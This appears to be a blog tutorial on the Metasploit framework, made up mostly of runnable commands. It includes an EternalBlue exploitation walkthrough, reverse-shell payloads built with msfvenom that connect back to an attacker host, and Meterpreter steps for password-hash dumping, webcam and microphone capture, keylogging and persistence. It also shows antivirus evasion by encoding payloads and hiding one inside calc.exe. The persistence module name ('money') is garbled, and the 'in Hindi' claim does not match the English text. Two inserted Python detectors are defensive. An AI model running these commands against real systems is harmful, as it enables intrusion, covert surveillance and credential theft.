
Metasploit Tutorial: Complete Exploitation Framework Guide

Metasploit framework tutorial in Hindi — msfconsole commands, exploit modules, meterpreter shell, payload generation with msfvenom, and practical exploitation of vulnerable systems.

Amit Kumar, Ethical Hacker & Founder


Metasploit Framework is an open-source penetration testing tool used for vulnerability research, exploit development, and payload delivery. This Metasploit tutorial walks through exploitation end to end, from basic commands to advanced Meterpreter techniques.

Metasploit Framework Overview

Metasploit was created by HD Moore in 2003. Today it is maintained and developed by Rapid7. It is the most widely used framework in the security testing world.

Metasploit's core capabilities include exploit development and research. Pre-built exploit modules are ready to use. Payload generation and delivery are also possible. Auxiliary modules are used for reconnaissance and DoS. Post modules are for further actions on compromised systems.

Metasploit Architecture

Module Types

Exploit modules target vulnerabilities. Both pre-built and custom exploits are available.

Payload modules carry the shellcode that runs after successful exploitation. Types: Singles (standalone payloads), Stagers (establish the connection), Stages (downloaded through stagers).

Auxiliary modules are used not for exploitation but for information gathering, scanning, and DoS.

Encoder modules encode payloads to avoid antivirus and other detection.

Post modules are for post-exploitation tasks on a compromised system.

Metasploit Installation

On Kali Linux

Metasploit comes pre-installed on Kali Linux:

```bash
msfconsole
```

Database Setup

```bash
sudo msfdb init
msfdb status
```

The database is required for workspace management, host tracking, and module caching.

Metasploit Console (msfconsole) Basics

Starting Metasploit

```bash
msfconsole
msfconsole -v              # Print the version and exit
```

Core Commands

```bash
help                       # List available commands
search <keyword>           # Search for modules
use <module>               # Load a module
info                       # Details of the current module
show options               # Show the module's options
set <option> <value>       # Set an option
unset <option>             # Unset an option
setg <option> <value>      # Set a global option
exploit                    # Start exploitation
run                        # Run the module (used for auxiliary modules)
back                       # Leave the current module
exit                       # Quit msfconsole
```

Database Workflow in Metasploit

Workspace Management

```bash
workspace                  # Show the current workspace
workspace -a new_test      # Create a new workspace
workspace <name>           # Switch workspace
workspace -d <name>        # Delete a workspace
```

Host Scanning with Database Integration

```bash
db_nmap -sV 192.168.1.0/24
hosts                      # Show scanned hosts
services                   # Show discovered services
vulns                      # Show vulnerabilities
```

db_nmap saves its results to the database automatically.

Metasploit Exploitation Step by Step

Step 1: Vulnerability Search

```bash
search type:exploit name:smb
search type:exploit cve:2017-0144   # EternalBlue
search target:Windows
```

Step 2: Select the Module

```bash
use exploit/windows/smb/ms17_010_eternalblue
```

Step 3: Set Options

```bash
show options
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set RPORT 445
```

Step 4: Exploitation

```bash
exploit
# or
run -j                     # Run in the background
```

Meterpreter Shell Basics

Meterpreter is an advanced payload that provides stealthy and powerful post-exploitation capabilities.

Meterpreter Commands After Access

```bash
sysinfo                    # System information
getuid                     # Current user
getpid                     # Current process ID
ps                         # Running processes
shell                      # Interactive command shell
hashdump                   # Dump password hashes
screenshot                 # Take a screenshot
webcam_list                # List available webcams
webcam_snap                # Take a photo from the webcam
record_mic                 # Record audio from the microphone
```

Privilege Escalation in Meterpreter

```bash
getsystem                  # Automatic privilege escalation
getprivs                   # Available privileges
```

Post-Exploitation Modules

```bash
run post/windows/gather/enum_applications
run post/windows/gather/enum_logged_on_users
run post/windows/manage/money              # Establish persistence
run post/windows/capture/keylog_recorder   # Keylogger
```

Meterpreter Session Management

```bash
background                 # Send the current session to the background
sessions -l                # List all sessions
sessions -i 1              # Interact with a specific session
sessions -K                # Kill all sessions
```

Msfvenom: Standalone Payload Generation

Msfvenom is used to generate standalone payloads outside Metasploit.

Basic Payload Generation

Linux reverse shell:

```bash
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=4444 -f elf -o shell.elf
chmod +x shell.elf
```

Windows executable:

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=4444 -f exe -o shell.exe
```

PHP reverse shell:

```bash
msfvenom -p php/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=4444 -f raw -o shell.php
```

Python payload:

```bash
msfvenom -p python/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=4444 -f raw
```

Payload Options

  • -f defines the output format (elf, exe, apk, jar, etc.).
  • -p specifies the payload.
  • -e selects an encoder.
  • -i sets the iterations (the number of encoding cycles).
  • -x supplies a custom executable template.
  • -k runs the payload in thread mode.

Handler Setup

Handler for a payload generated with msfvenom:

```bash
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST ATTACKER_IP
set LPORT 4444
exploit -j
```

Common Metasploit Auxiliary Modules

Port Scanning

```bash
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 1-1000
run
```

SMB Enumeration

```bash
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
run
```

HTTP Enumeration

```bash
use auxiliary/scanner/http/http_version
set RHOSTS target.com
run
```

SSH Brute Force

```bash
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.100
set USER_FILE /root/users.txt
set PASS_FILE /root/passwords.txt
run
```
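On the target's side, a user-list and password-list login scan like the one above shows up in the sshd log as a burst of failed logins from one source across several usernames. The detector below is an added example, not part of the original tutorial; the log lines are constructed, and the thresholds, window and `year` parameter are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd log lines for illustration (not from the tutorial).
SAMPLE_LOG = """\
Jun 11 10:00:01 srv sshd[2101]: Failed password for root from 192.168.1.50 port 40112 ssh2
Jun 11 10:00:02 srv sshd[2102]: Failed password for root from 192.168.1.50 port 40113 ssh2
Jun 11 10:00:03 srv sshd[2103]: Failed password for admin from 192.168.1.50 port 40114 ssh2
Jun 11 10:00:04 srv sshd[2104]: Failed password for admin from 192.168.1.50 port 40115 ssh2
Jun 11 10:00:05 srv sshd[2105]: Failed password for invalid user test from 192.168.1.50 port 40116 ssh2
Jun 11 10:00:06 srv sshd[2106]: Failed password for invalid user oracle from 192.168.1.50 port 40117 ssh2
Jun 11 10:03:10 srv sshd[2140]: Failed password for alice from 192.168.1.77 port 51920 ssh2
Jun 11 10:03:25 srv sshd[2141]: Accepted password for alice from 192.168.1.77 port 51921 ssh2
"""

FAILED = re.compile(
    r"^(\w{3}\s+\d+ [\d:]{8}) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(\S+) from (\S+) port \d+")


def find_bruteforce(log_text, year=2024, window=timedelta(seconds=60),
                    min_failures=5, min_users=3):
    """Return {source_ip: (failures, distinct_users)} for sources whose failed
    logins reach both thresholds inside one sliding time window."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if m:
            # Syslog timestamps carry no year; `year` is an assumed parameter.
            ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
            events[m.group(3)].append((ts, m.group(2)))
    flagged = {}
    for src, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1  # shrink the window from the left
            burst = evs[start:end + 1]
            users = {user for _, user in burst}
            if len(burst) >= min_failures and len(users) >= min_users:
                flagged[src] = max(flagged.get(src, (0, 0)),
                                   (len(burst), len(users)))
    return flagged


if __name__ == "__main__":
    for ip, (fails, users) in find_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {fails} failed logins across {users} usernames")
```

Requiring several distinct usernames as well as a failure count keeps a single user mistyping a password, like 192.168.1.77 in the sample, out of the results.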

Metasploit Tutorial: Practical Walkthrough

Scenario: Exploiting Windows SMB (EternalBlue)

Lab Setup:

Kali Linux attacker machine. Metasploitable2 or Windows 7 target machine. Both machines on the same network.

Step 1: Target Scan

```bash
db_nmap -sS -sV -p 445 192.168.56.0/24
```

Port 445, the SMB service, should show as open on the target.

Step 2: Search Exploit

```bash
search type:exploit name:ms17-010
```

The EternalBlue exploit will be listed.

Step 3: Load Exploit

```bash
use exploit/windows/smb/ms17_010_eternalblue
show options
```

Step 4: Configure

```bash
set RHOSTS 192.168.56.101
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.56.102
set LPORT 4444
```

Step 5: Exploit

```bash
exploit
```

A Meterpreter session should open.

Step 6: Post-Exploitation

```bash
sysinfo
getuid
getsystem
hashdump
shell
```
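Seen from the network side, the walkthrough above (and the step-by-step section earlier) produces an inbound connection to port 445 on the target, followed by the target connecting back to LHOST on LPORT because the payload is reverse_tcp. The correlation below is an added example, not part of the original tutorial; the flow-record format, the `COMMON_PORTS` list and the 30-second window are assumptions, and the sample records are constructed from the lab addresses used above.

```python
# Constructed flow records for illustration (not from the tutorial).
# Assumed format: "epoch_seconds src_ip dst_ip dst_port"
SAMPLE_FLOWS = """\
1000 192.168.56.102 192.168.56.101 445
1004 192.168.56.101 192.168.56.102 4444
1010 192.168.56.101 192.168.56.10 53
2000 192.168.56.20 192.168.56.101 445
2300 192.168.56.101 192.168.56.20 445
3000 192.168.56.101 192.168.56.30 8080
"""

# Assumption: destination ports considered routine on this network; tune per site.
COMMON_PORTS = {53, 80, 88, 123, 135, 139, 389, 443, 445}


def parse_flows(flow_text):
    """Return (ts, src, dst, dport) tuples in time order, skipping blank lines."""
    rows = []
    for line in flow_text.splitlines():
        if line.strip():
            ts, src, dst, dport = line.split()
            rows.append((int(ts), src, dst, int(dport)))
    return sorted(rows)


def find_callbacks(flow_text, window=30, smb_port=445):
    """Flag a host that connects back to a peer on an uncommon port within
    `window` seconds of that peer connecting to the host's SMB port."""
    last_smb = {}  # (smb_server, client) -> time of latest inbound SMB connection
    alerts = []
    for ts, src, dst, dport in parse_flows(flow_text):
        if dport == smb_port:
            last_smb[(dst, src)] = ts
            continue
        seen = last_smb.get((src, dst))
        if seen is not None and ts - seen <= window and dport not in COMMON_PORTS:
            alerts.append({"host": src, "peer": dst, "port": dport,
                           "delay": ts - seen})
    return alerts


if __name__ == "__main__":
    for alert in find_callbacks(SAMPLE_FLOWS):
        print(alert)
```

The rule keys on the sequence rather than on port 4444, so it still fires when LPORT is set to another uncommon value.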

Metasploit Evasion Techniques

Ways to avoid antivirus detection:

Encoding Payloads

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe
```

Template Use

Use a legitimate executable as the template:

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -x calc.exe -k -f exe -o payload.exe
```

Metasploit Resources for Learning

The official Metasploit documentation provides a comprehensive guide. Offensive Security's Metasploit Unleashed is a free online course. Metasploit community resources are available on the official website. Practice labs are available on TryHackMe and HackTheBox.

Metasploit Tutorial Summary

Metasploit Framework is the most powerful tool for penetration testing. This tutorial covered:

  • Metasploit architecture and module types
  • msfconsole commands and the database workflow
  • Exploitation step by step
  • Meterpreter shell and post-exploitation
  • Msfvenom payload generation
  • Auxiliary modules for reconnaissance
  • Practical EternalBlue exploitation walkthrough
  • Evasion techniques and encoding

Learning Metasploit is an ongoing process: practice regularly and explore new modules. Cyber Defence's ethical hacking course covers Metasploit comprehensively with hands-on labs. An Nmap commands tutorial and a privilege escalation tutorial are also available to help you build out a complete penetration testing workflow.

Metasploit is a professional-grade tool that is essential for real-world security assessments. Both structured learning and practical experience are necessary in this field.
